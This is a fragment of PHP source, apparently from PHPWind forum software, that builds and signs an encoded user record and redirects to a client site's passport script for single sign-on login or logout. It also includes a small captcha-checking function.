if (!$db_pptifopen || $db_ppttype != 'server') { Showmsg('passport_close'); } $jumpurl = str_replace('=', '=', $jumpurl); $userdb = array(); $userService = L::loadClass('UserService', 'user'); /* @var $userService PW_UserService */ $rt = $userService->get($winduid, true, true); $userdb['uid'] = $rt['uid']; $userdb['username'] = $rt['username']; $userdb['password'] = $rt['password']; $userdb['email'] = $rt['email']; $userdb['rvrc'] = $rt['rvrc']; $userdb['money'] = $rt['money']; $userdb['credit'] = $rt['credit']; $userdb['currency'] = $rt['currency']; $userdb['time'] = $timestamp; $userdb['cktime'] = $cktime ? $cktime : 'F'; $userdb_encode = ''; foreach ($userdb as $key => $val) { $userdb_encode .= $userdb_encode ? "&{$key}={$val}" : "{$key}={$val}"; } $db_hash = $db_pptkey; $userdb_encode = str_replace('=', '', StrCode($userdb_encode)); if ($action == 'login') { $verify = md5("login{$userdb_encode}{$forward}{$db_pptkey}"); ObHeader("{$jumpurl}/passport_client.php?action=login&userdb=" . rawurlencode($userdb_encode) . "&forward=" . rawurlencode($forward) . "&verify=" . rawurlencode($verify) . "&ajax={$ajax}"); } elseif ($action == 'quit') { $verify = md5("quit{$userdb_encode}{$forward}{$db_pptkey}"); ObHeader("{$jumpurl}/passport_client.php?action=quit&userdb=" . rawurlencode($userdb_encode) . "&forward=" . rawurlencode($forward) . "&verify=" . rawurlencode($verify)); }
function GdConfirm($code) { Cookie('cknum', '', 0); if (!$code || !SafeCheck(explode("\t", StrCode(GetCookie('cknum'), 'DECODE')), strtoupper($code), 'cknum', 1800)) { Showmsg('check_error'); } }